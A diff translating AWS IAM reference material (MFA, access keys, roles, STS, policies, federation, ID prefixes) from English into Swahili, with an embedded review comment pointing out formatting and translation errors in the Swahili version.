-Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+Watumiaji wanaweza kuwa na **MFA iliyoanzishwa kuingia** kupitia console. Tokeni za API za watumiaji walioanzisha MFA hazilindwi na MFA. Ikiwa unataka **kudhibiti ufikiaji wa funguo za API za watumiaji kwa kutumia MFA** unahitaji kuashiria katika sera hiyo kwamba ili kutekeleza vitendo fulani MFA inahitaji kuwepo (mfano [**hapa**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
#### CLI
-- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+- **Kitambulisho cha Funguo za Ufikiaji**: 20 ya herufi kubwa za alphanumeric za nasibu kama AKHDNAPO86BSHKDIRYT
+- **Kitambulisho cha funguo za siri za ufikiaji**: 40 ya herufi kubwa na ndogo za nasibu: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Haiwezekani kurejesha vitambulisho vya funguo za siri vilivyopotea).
-Whenever you need to **change the Access Key** this is the process you should follow:\
-NAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
+Wakati wowote unahitaji **kubadilisha Funguo za Ufikiaji** huu ndio mchakato unapaswa kufuata:\
+NAN;_Cunda funguo mpya za ufikiaji -> Tumia funguo mpya kwenye mfumo/programu -> weka ya awali kama isiyo hai -> Jaribu na thibitisha funguo mpya za ufikiaji zinafanya kazi -> Futa funguo za zamani za ufikiaji_
-### MFA - Multi Factor Authentication
+### MFA - Uthibitishaji wa Vigezo Vingi
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+Inatumika ku **unda kipengele cha ziada kwa uthibitishaji** pamoja na mbinu zako zilizopo, kama vile nenosiri, hivyo kuunda kiwango cha uthibitishaji wa vigezo vingi.\
+Unaweza kutumia **programu ya bure ya virtual au kifaa halisi**. Unaweza kutumia programu kama uthibitishaji wa google bure kuanzisha MFA katika AWS.
-Policies with MFA conditions can be attached to the following:
+Sera zenye masharti ya MFA zinaweza kuambatanishwa na yafuatayo:
-- An IAM user or group
-- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
-- The trust policy of an IAM role that can be assumed by a user
-
-If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
-Note that **`AssumeRole` credentials don't contain this information**.
+- Mtumiaji wa IAM au kundi
+- Rasilimali kama vile ndoo ya Amazon S3, foleni ya Amazon SQS, au mada ya Amazon SNS
+- Sera ya kuaminika ya jukumu la IAM ambalo linaweza kuchukuliwa na mtumiaji
+Ikiwa unataka **kufikia kupitia CLI** rasilimali ambayo **inaangalia MFA** unahitaji kuita **`GetSessionToken`**. Hiyo itakupa tokeni yenye taarifa kuhusu MFA.\
+Kumbuka kwamba **`AssumeRole` ithibati hazina taarifa hii**.
```bash
aws sts get-session-token --serial-number --token-code
```
+As [**imesemwa hapa**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), kuna kesi nyingi tofauti ambapo **MFA haiwezi kutumika**.
-As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+### [Makundi ya watumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
-### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
+Kundi la [mtumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) ni njia ya **kuunganisha sera kwa watumiaji wengi** kwa wakati mmoja, ambayo inaweza kurahisisha usimamizi wa ruhusa za watumiaji hao. **Majukumu na makundi hayawezi kuwa sehemu ya kundi**.
-An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+Unaweza kuunganisha **sera inayotegemea utambulisho kwa kundi la mtumiaji** ili kwamba **watumiaji** wote katika kundi la mtumiaji **wapate ruhusa za sera**. **Huwezi** kutambua **kundi la mtumiaji** kama **`Principal`** katika **sera** (kama sera inayotegemea rasilimali) kwa sababu makundi yanahusiana na ruhusa, si uthibitishaji, na wakuu ni entiti za IAM zilizothibitishwa.
-You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+Hapa kuna sifa muhimu za makundi ya watumiaji:
-Here are some important characteristics of user groups:
+- Kundi la mtumiaji **linaweza kuwa na watumiaji wengi**, na **mtumiaji** anaweza **kuwa sehemu ya makundi mengi**.
+- **Makundi ya watumiaji hayawezi kuingizwa**; yanaweza kuwa na watumiaji tu, si makundi mengine ya watumiaji.
+- Hakuna **kundi la mtumiaji la default ambalo linajumuisha watumiaji wote katika akaunti ya AWS**. Ikiwa unataka kuwa na kundi la mtumiaji kama hilo, lazima ulunde na kupewa kila mtumiaji mpya.
+- Idadi na ukubwa wa rasilimali za IAM katika akaunti ya AWS, kama vile idadi ya makundi, na idadi ya makundi ambayo mtumiaji anaweza kuwa mwanachama, zimepangwa. Kwa maelezo zaidi, angalia [IAM na AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
-- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
-- **User groups can't be nested**; they can contain only users, not other user groups.
-- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
-- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+### [Majukumu ya IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
-### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
+**Jukumu la IAM** ni **kama** **mtumiaji**, kwa kuwa ni **utambulisho wenye sera za ruhusa zinazotambulisha kile** kinaweza na hakiwezi kufanya katika AWS. Hata hivyo, jukumu **halina akreditif yoyote** (nenosiri au funguo za ufikiaji) zinazohusishwa nalo. Badala ya kuwa na uhusiano wa kipekee na mtu mmoja, jukumu linakusudia kuwa **linaweza kuchukuliwa na yeyote anayeihitaji (na kuwa na ruhusa za kutosha)**. **Mtumiaji wa IAM anaweza kuchukua jukumu ili kwa muda** kuchukua ruhusa tofauti kwa kazi maalum. Jukumu linaweza **kupewa** [**mtumiaji wa shirikisho**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) anayeingia kwa kutumia mtoa huduma wa utambulisho wa nje badala ya IAM.
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
+Jukumu la IAM linajumuisha **aina mbili za sera**: **sera ya kuamini**, ambayo haiwezi kuwa tupu, inayoeleza **nani anaweza kuchukua** jukumu, na **sera ya ruhusa**, ambayo haiwezi kuwa tupu, inayoeleza **nini inaweza kufikiwa**.
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+#### Huduma ya Usalama ya Tokeni ya AWS (STS)
-#### AWS Security Token Service (STS)
+Huduma ya Usalama ya Tokeni ya AWS (STS) ni huduma ya wavuti inayorahisisha **utoaji wa akreditif za muda, zenye ruhusa zilizopunguzwa**. Imeundwa mahsusi kwa:
-AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+### [Akreditif za muda katika IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
-### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
+**Akreditif za muda zinatumika hasa na majukumu ya IAM**, lakini pia kuna matumizi mengine. Unaweza kuomba akreditif za muda ambazo zina seti ya ruhusa zilizopunguzwa zaidi kuliko mtumiaji wako wa kawaida wa IAM. Hii **inaepuka** wewe **kufanya kazi ambazo haziruhusiwi** na akreditif zilizopunguzwa zaidi. Faida ya akreditif za muda ni kwamba zinakoma moja kwa moja baada ya kipindi fulani. Una udhibiti juu ya muda ambao akreditif hizo ni halali.
-**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+### Sera
-### Policies
+#### Ruhusa za Sera
-#### Policy Permissions
+Zinatumiwa kupewa ruhusa. Kuna aina 2:
-Are used to assign permissions. There are 2 types:
-
-- AWS managed policies (preconfigured by AWS)
-- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified.\
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+- Sera zinazodhibitiwa na AWS (zilizopangwa na AWS)
+- Sera Zinazosimamiwa na Wateja: Zimepangwa na wewe. Unaweza kuunda sera kulingana na sera zinazodhibitiwa na AWS (ukibadilisha moja yao na kuunda yako mwenyewe), ukitumia jenereta ya sera (maoni ya GUI yanayokusaidia kutoa na kukataa ruhusa) au kuandika yako mwenyewe.
+Kwa **default ufikiaji** unakataliwa, ufikiaji utawekwa ikiwa jukumu maalum limeainishwa.\
+Ikiwa **"Deny" moja ipo, itazidi "Allow"**, isipokuwa kwa maombi yanayotumia akreditif za usalama za mizizi ya akaunti ya AWS (ambazo zinaruhusiwa kwa default).
```javascript
{
- "Version": "2012-10-17", //Version of the policy
- "Statement": [ //Main element, there can be more than 1 entry in this array
- {
- "Sid": "Stmt32894y234276923" //Unique identifier (optional)
- "Effect": "Allow", //Allow or deny
- "Action": [ //Actions that will be allowed or denied
- "ec2:AttachVolume",
- "ec2:DetachVolume"
- ],
- "Resource": [ //Resource the action and effect will be applied to
- "arn:aws:ec2:*:*:volume/*",
- "arn:aws:ec2:*:*:instance/*"
- ],
- "Condition": { //Optional element that allow to control when the permission will be effective
- "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
- }
- }
- ]
+"Version": "2012-10-17", //Version of the policy
+"Statement": [ //Main element, there can be more than 1 entry in this array
+{
+"Sid": "Stmt32894y234276923" //Unique identifier (optional)
+"Effect": "Allow", //Allow or deny
+"Action": [ //Actions that will be allowed or denied
+"ec2:AttachVolume",
+"ec2:DetachVolume"
+],
+"Resource": [ //Resource the action and effect will be applied to
+"arn:aws:ec2:*:*:volume/*",
+"arn:aws:ec2:*:*:instance/*"
+],
+"Condition": { //Optional element that allow to control when the permission will be effective
+"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+}
+}
+]
}
```
+The [sehemu za kimataifa ambazo zinaweza kutumika kwa masharti katika huduma yoyote zimeandikwa hapa](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
+[Sehemu maalum ambazo zinaweza kutumika kwa masharti kwa kila huduma zimeandikwa hapa](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
-The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
-The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+#### Sera za Ndani
-#### Inline Policies
+Aina hii ya sera ni **zinazopewa moja kwa moja** kwa mtumiaji, kundi au jukumu. Hivyo, hazionekani katika orodha ya Sera kama wengine wanaweza kuzitumia.\
+Sera za ndani ni muhimu ikiwa unataka **kuhifadhi uhusiano mkali wa moja kwa moja kati ya sera na kitambulisho** ambacho kimewekwa. Kwa mfano, unataka kuwa na uhakika kwamba ruhusa katika sera hazitapewa kwa bahati mbaya kwa kitambulisho kingine isipokuwa kile ambacho zimekusudiwa. Unapokuwa unatumia sera ya ndani, ruhusa katika sera hiyo haziwezi kuunganishwa kwa bahati mbaya na kitambulisho kibaya. Zaidi ya hayo, unapokuwa unatumia AWS Management Console kufuta kitambulisho hicho, sera zilizoingizwa katika kitambulisho pia zitatolewa. Hiyo ni kwa sababu ni sehemu ya chombo kikuu.
-This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+#### Sera za Rasilimali za Ndoo
-#### Resource Bucket Policies
+Hizi ni **sera** ambazo zinaweza kufafanuliwa katika **rasilimali**. **Sio rasilimali zote za AWS zinazozipokea**.
-These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+Ikiwa chombo hakina kukataa waziwazi juu yao, na sera ya rasilimali inawapa ufikiaji, basi wanaruhusiwa.
-If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+### Mipaka ya IAM
-### IAM Boundaries
+Mipaka ya IAM inaweza kutumika **kudhibiti ruhusa ambazo mtumiaji au jukumu linapaswa kuwa na ufikiaji**. Kwa njia hii, hata kama seti tofauti za ruhusa zinatolewa kwa mtumiaji na **sera tofauti**, operesheni itashindwa ikiwa atajaribu kuzitumia.
-IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+Mpaka ni sera tu iliyoambatanishwa na mtumiaji ambayo **inaonyesha kiwango cha juu cha ruhusa ambacho mtumiaji au jukumu linaweza kuwa nacho**. Hivyo, **hata kama mtumiaji ana ufikiaji wa Msimamizi**, ikiwa mpaka inaonyesha anaweza kusoma tu ndoo za SĀ·, hiyo ndiyo kiwango cha juu anachoweza kufanya.
-A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read SĀ· buckets, that's the maximum he can do.
+**Hii**, **SCPs** na **kufuata kanuni ya ruhusa ndogo** ndiyo njia za kudhibiti kwamba watumiaji hawana ruhusa zaidi ya zile anazohitaji.
-**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+### Sera za Kikao
-### Session Policies
-
-A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
-
-This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+Sera ya kikao ni **sera inayowekwa wakati jukumu linachukuliwa** kwa namna fulani. Hii itakuwa kama **mpaka wa IAM kwa kikao hicho**: Hii inamaanisha kwamba sera ya kikao haitoi ruhusa bali **inaweka vizuizi kwa zile zilizoonyeshwa katika sera** (ikiwa ruhusa za juu ni zile ambazo jukumu lina).
+Hii ni muhimu kwa **hatua za usalama**: Wakati msimamizi anapokuwa anachukua jukumu lenye mamlaka makubwa anaweza kupunguza ruhusa kuwa zile tu zilizoonyeshwa katika sera ya kikao endapo kikao kitakumbwa na hatari.
```bash
aws sts assume-role \
- --role-arn \
- --role-session-name \
- [--policy-arns ]
- [--policy ]
+--role-arn \
+--role-session-name \
+[--policy-arns ]
+[--policy ]
```
+Note that by default **AWS inaweza kuongeza sera za kikao kwa vikao** ambavyo vitaundwa kwa sababu za tatu. Kwa mfano, katika [roles za cognito zisizo na uthibitisho](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) kwa kawaida (kwa kutumia uthibitisho ulioimarishwa), AWS itaunda **akiba za kikao zenye sera ya kikao** ambayo inakadiria huduma ambazo kikao kinaweza kufikia [**katika orodha ifuatayo**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
-Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+Hivyo, ikiwa kwa wakati fulani unakutana na kosa "... kwa sababu hakuna sera ya kikao inayoruhusu ...", na jukumu lina ufikiaji wa kutekeleza kitendo hicho, ni kwa sababu **kuna sera ya kikao inayozuia**.
-Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+### Ushirikiano wa Utambulisho
-### Identity Federation
+Ushirikiano wa utambulisho **unawaruhusu watumiaji kutoka kwa watoa huduma za utambulisho ambao ni nje** ya AWS kufikia rasilimali za AWS kwa usalama bila ya kutoa akiba za mtumiaji wa AWS kutoka kwa akaunti halali ya IAM.\
+Mfano wa mtoa huduma wa utambulisho unaweza kuwa **Microsoft Active Directory** yako mwenyewe (kupitia **SAML**) au huduma za **OpenID** (kama **Google**). Ufikiaji wa ushirikiano utaweza kuruhusu watumiaji ndani yake kufikia AWS.
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
-An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+Ili kuunda uaminifu huu, **Mtoa Huduma wa Utambulisho wa IAM unaundwa (SAML au OAuth)** ambao utakuwa **na uaminifu** kwa **jukwaa lingine**. Kisha, angalau **jukumu moja linapewa (linaloaminika) kwa Mtoa Huduma wa Utambulisho**. Ikiwa mtumiaji kutoka kwenye jukwaa lililoaminika anafikia AWS, atakuwa akifikia kama jukumu lililotajwa.
-To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
-
-However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+Hata hivyo, kwa kawaida unataka kutoa **jukumu tofauti kulingana na kundi la mtumiaji** katika jukwaa la upande wa tatu. Kisha, **majukumu kadhaa ya IAM yanaweza kuamini** Mtoa Huduma wa Utambulisho wa upande wa tatu na jukwaa la upande wa tatu litakuwa lile linaloruhusu watumiaji kuchukua jukumu moja au jingine.
-### IAM Identity Center
+### Kituo cha Utambulisho wa IAM
-AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+Kituo cha Utambulisho wa AWS IAM (mfuasi wa AWS Single Sign-On) kinapanua uwezo wa Usimamizi wa Utambulisho na Ufikiaji wa AWS (IAM) kutoa **mahali pa kati** ambalo linaunganisha **usimamizi wa watumiaji na ufikiaji wao kwa akaunti za AWS** na programu za wingu.
-The login domain is going to be something like `.awsapps.com`.
+Domeni la kuingia litakuwa kitu kama `.awsapps.com`.
-To login users, there are 3 identity sources that can be used:
+Ili kuingia watumiaji, kuna vyanzo 3 vya utambulisho ambavyo vinaweza kutumika:
-- Identity Center Directory: Regular AWS users
-- Active Directory: Supports different connectors
-- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
+- Kituo cha Utambulisho: Watumiaji wa kawaida wa AWS
+- Active Directory: Inasaidia viunganishi tofauti
+- Mtoa Huduma wa Utambulisho wa Nje: Watumiaji wote na makundi yanatoka kwa Mtoa Huduma wa Utambulisho wa Nje (IdP)
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
+Katika kesi rahisi ya kituo cha utambulisho, **Kituo cha Utambulisho kitakuwa na orodha ya watumiaji na makundi** na kitakuwa na uwezo wa **kutoa sera** kwao kwa **akaunti yoyote** ya shirika.
-In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+Ili kutoa ufikiaji kwa mtumiaji/kundi wa Kituo cha Utambulisho kwa akaunti, **Mtoa Huduma wa Utambulisho wa SAML unaoaminika Kituo cha Utambulisho utaundwa**, na **jukumu linaloaminika Mtoa Huduma wa Utambulisho lenye sera zilizotajwa litaundwa** katika akaunti ya marudio.
#### AwsSSOInlinePolicy
-It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+Inawezekana **kutoa ruhusa kupitia sera za ndani kwa majukumu yaliyoandaliwa kupitia Kituo cha Utambulisho wa IAM**. Majukumu yaliyoandaliwa katika akaunti zinazotolewa **sera za ndani katika Kituo cha Utambulisho wa AWS** yatakuwa na ruhusa hizi katika sera ya ndani inayoitwa **`AwsSSOInlinePolicy`**.
-Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+Hivyo, hata kama unaona majukumu 2 yenye sera ya ndani inayoitwa **`AwsSSOInlinePolicy`**, **haimaanishi ina ruhusa sawa**.
-### Cross Account Trusts and Roles
+### Uaminifu na Majukumu ya Akaunti Mbalimbali
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+**Mtumiaji** (anayeaminika) anaweza kuunda Jukumu la Akaunti Mbalimbali lenye sera fulani na kisha, **kuruhusu mtumiaji mwingine** (aliyeaminika) **kuingia kwenye akaunti yake** lakini tu **akiwa na ufikiaji ulioainishwa katika sera mpya za jukumu**. Ili kuunda hii, tengeneza Jukumu jipya na uchague Jukumu la Akaunti Mbalimbali. Majukumu ya Ufikiaji wa Akaunti Mbalimbali yanatoa chaguzi mbili. Kutoa ufikiaji kati ya akaunti za AWS ambazo unamiliki, na kutoa ufikiaji kati ya akaunti ambayo unamiliki na akaunti ya AWS ya upande wa tatu.\
+Inapendekezwa **kueleza mtumiaji ambaye anaaminika na si kuweka kitu chochote cha jumla** kwa sababu vinginevyo, watumiaji wengine walioidhinishwa kama watumiaji wa ushirikiano wataweza pia kutumia uaminifu huu.
### AWS Simple AD
-Not supported:
+Haitambuliwi:
-- Trust Relations
-- AD Admin Center
-- Full PS API support
-- AD Recycle Bin
-- Group Managed Service Accounts
-- Schema Extensions
-- No Direct access to OS or Instances
+- Mahusiano ya Uaminifu
+- Kituo cha Usimamizi wa AD
+- Msaada kamili wa PS API
+- Kituo cha Recycle cha AD
+- Akaunti za Huduma za Kundi
+- Upanuzi wa Schema
+- Hakuna ufikiaji wa moja kwa moja kwa OS au Mifano
-#### Web Federation or OpenID Authentication
+#### Ushirikiano wa Mtandao au Uthibitishaji wa OpenID
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+Programu inatumia AssumeRoleWithWebIdentity kuunda akiba za muda. Hata hivyo, hii haitoi ufikiaji kwa console ya AWS, bali ufikiaji tu kwa rasilimali ndani ya AWS.
-### Other IAM options
+### Chaguzi Nyingine za IAM
-- You can **set a password policy setting** options like minimum length and password requirements.
-- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+- Unaweza **kufafanua mipangilio ya sera ya nywila** kama urefu wa chini na mahitaji ya nywila.
+- Unaweza **kupakua "Ripoti ya Akiba"** yenye taarifa kuhusu akiba za sasa (kama wakati wa kuunda mtumiaji, ikiwa nywila imewekwa...). Unaweza kuunda ripoti ya akiba mara kwa mara kama mara moja kila **saa nne**.
-AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+Usimamizi wa Utambulisho na Ufikiaji wa AWS (IAM) unatoa **udhibiti wa ufikiaji wa kina** katika AWS yote. Kwa IAM, unaweza kufafanua **nani anaweza kufikia huduma na rasilimali zipi**, na chini ya hali zipi. Kwa sera za IAM, unasimamia ruhusa kwa wafanyakazi na mifumo yako ili **kuhakikisha ruhusa za chini zaidi**.
-### IAM ID Prefixes
+### Awali za ID za IAM
-In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+Katika [**ukurasa huu**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) unaweza kupata **awali za ID za IAM** za funguo kulingana na asili yao:
-| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
+| ABIA | [Token ya mtoa huduma ya AWS STS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ACCA | Context-specific credential |
-| AGPA | User group |
-| AIDA | IAM user |
-| AIPA | Amazon EC2 instance profile |
-| AKIA | Access key |
-| ANPA | Managed policy |
-| ANVA | Version in a managed policy |
-| APKA | Public key |
-| AROA | Role |
-| ASCA | Certificate |
-| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+| ACCA | Akiba maalum ya muktadha |
+| AGPA | Kundi la mtumiaji |
+| AIDA | Mtumiaji wa IAM |
+| AIPA | Profaili ya mfano wa Amazon EC2 |
+| AKIA | Funguo ya ufikiaji |
+| ANPA | Sera iliyosimamiwa |
+| ANVA | Toleo katika sera iliyosimamiwa |
+| APKA | Funguo ya umma |
+| AROA | Jukumu |
+| ASCA | Cheti |
+| ASIA | [Funguo za ufikiaji za muda (AWS STS)](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) tumia awali hii, lakini ni za kipekee tu kwa pamoja na funguo ya siri ya ufikiaji na tokeni ya kikao. |
-### Recommended permissions to audit accounts
+### Ruhusa zinazopendekezwa kukagua akaunti
-The following privileges grant various read access of metadata:
+Ruhusa zifuatazo zinatoa ufikiaji wa kusoma wa metadata:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
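Review bot: Dropping the blank lines after the two bullet lists breaks the rendering of this hunk: the paragraph beginning "Ikiwa unataka **kufikia kupitia CLI**" now follows the last bullet of the MFA list directly, and "Kwa **default ufikiaji** unakataliwa" follows the customer-managed-policies bullet directly, so Markdown treats each as a lazy continuation of that bullet and renders the paragraph inside the list; restore the blank line before each paragraph. The translation also needs a pass: English fragments survive at the start of three translated lines (the ones beginning "As", "The" and "Note that by default"); "credentials" is rendered inconsistently as ithibati, akreditif and akiba, and akiba reads as savings rather than credentials; "EC2 instance" became mfano/Mifano (example) in the Simple AD list and in the AIPA table row, where instance should stay untranslated; in the cross-account paragraph both parties became anayeaminika/aliyeaminika (trusted), losing the trusting-versus-trusted distinction the sentence depends on, so the first should be anayeamini; the mojibake "SĀ·" in the boundaries paragraph stands for S3 and should be fixed rather than propagated; and "tumia awali hii" in the ASIA row is an imperative where the source is descriptive (zinatumia awali hii). Lastly, the translation tooling stripped the leading indentation of the JSON policy and of the multi-line `aws sts assume-role` command; the JSON still parses but its nesting is unreadable, so re-indent both blocks to match the removed lines.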
@@ -336,14 +324,13 @@ The following privileges grant various read access of metadata:
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
-## Misc
+## Mambo Mengine
-### CLI Authentication
-
-In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
-In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
-Example of credentials file with more than 1 profile:
+### Uthibitishaji wa CLI
